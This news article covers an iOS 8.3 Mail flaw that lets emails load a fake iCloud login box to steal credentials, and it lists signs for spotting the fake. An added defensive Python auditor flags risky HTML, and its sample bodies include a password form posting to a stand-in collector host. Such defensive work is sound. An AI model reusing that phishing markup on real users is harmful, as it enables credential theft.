
Beware of iCloud login prompts: A new security flaw lets hackers steal your info

Apple’s mobile operating system iOS has a reputation for being more secure than Android, but recently, it seems that more hackers are targeting iPhone and iPad users. A GitHub user by the name of Jansoucek discovered yet another iOS vulnerability back in January and reported it to Apple. The friendly hacker demonstrated how attack code can be used in the Mail app to steal users’ iCloud logins and other sensitive information.

Apparently, ever since Apple released iOS 8.3 in early April, the Mail app has stopped removing potentially dangerous HTML code from the emails users receive. One tag instructs the Mail app to download and execute code remotely. The command then brings up a form box, which mimics the appearance of an iCloud login request box. If the user logs in, the hacker can then steal his or her iCloud account user name and password. With these two pieces of information, the hacker can steal other personal information stored in iCloud.

Proof-of-concept: iOS 8.3 attack

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Jansoucek wrote. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS [cascading style sheets].”

To make matters worse, the attack places a tracking cookie in the Mail app, so that the code doesn’t execute the same command every time the infected email is opened in the app. That way, the user doesn’t get suspicious of the message or notice the link between that specific email and the iCloud login prompt. Additionally, the hacker can change the code at any time to access different information.
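On the defensive side, a mail gateway or client can flag HTML bodies that are able to swap themselves for remote content or that ask for a password. The sketch below is an added example, not code from the article or from the researcher's proof of concept; the tag list, the verdict rule and the sample messages are assumptions constructed for illustration, since the article does not name the tag involved.

```python
from html.parser import HTMLParser

# Assumption: tags treated here as able to pull in or navigate to remote
# content without any script. The article does not name the tag it refers to.
REMOTE_LOADERS = {"iframe", "frame", "object", "embed", "base"}

class MailHtmlAuditor(HTMLParser):
    """Walks an HTML email body and records findings; it never fetches anything."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._form_action = None  # action URL of the form currently open

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag in REMOTE_LOADERS:
            self.findings.append(("remote-loader", tag))
        elif tag == "form":
            self._form_action = a.get("action", "")
            self.findings.append(("form", self._form_action))
        elif tag == "input" and a.get("type", "").lower() == "password":
            # A password field in mail is the "collector" the quote describes.
            self.findings.append(("password-field", self._form_action or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None

def audit(html_body):
    """Return (verdict, findings) for one HTML body."""
    parser = MailHtmlAuditor()
    parser.feed(html_body)
    parser.close()
    kinds = {kind for kind, _ in parser.findings}
    risky = kinds & {"meta-refresh", "remote-loader", "password-field"}
    return ("quarantine" if risky else "deliver"), parser.findings

# Constructed sample bodies (not taken from any real message).
SAMPLE_REFRESH = ('<html><head><meta http-equiv="refresh" '
                  'content="0; url=https://mail-content.example/body.html">'
                  '</head><body>Hi</body></html>')
SAMPLE_FORM = ('<form action="https://collector.example/submit" method="post">'
               '<input type="text" name="id"><input type="password" name="pw"></form>')
SAMPLE_BENIGN = '<p>Report attached. <a href="https://intranet.example/q2">Link</a></p>'

if __name__ == "__main__":
    for name in ("SAMPLE_REFRESH", "SAMPLE_FORM", "SAMPLE_BENIGN"):
        print(name, audit(globals()[name]))
```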

Luckily, there is a trick iOS users can employ to protect themselves from the hack. Although the malicious code does a pretty good imitation of the iCloud login box, it isn’t perfect. First off, the box asks for both your Apple ID and your password, while iCloud typically asks for only your password and already displays your user name. Secondly, the box isn’t modal, so the background doesn’t fade and the screen isn’t static when the prompt comes up. Additionally, keyboard suggestions remain activated, which is something that never happens when you receive an iCloud prompt on iOS.

Of course, these differences are subtle, and many won’t notice them. Apple has yet to respond, but hopefully the patch will come soon. Until then, the next time you see an iCloud login request, check for these telltale signs to ensure that you’re not being hacked.

Malarie Gokey
Former Digital Trends Contributor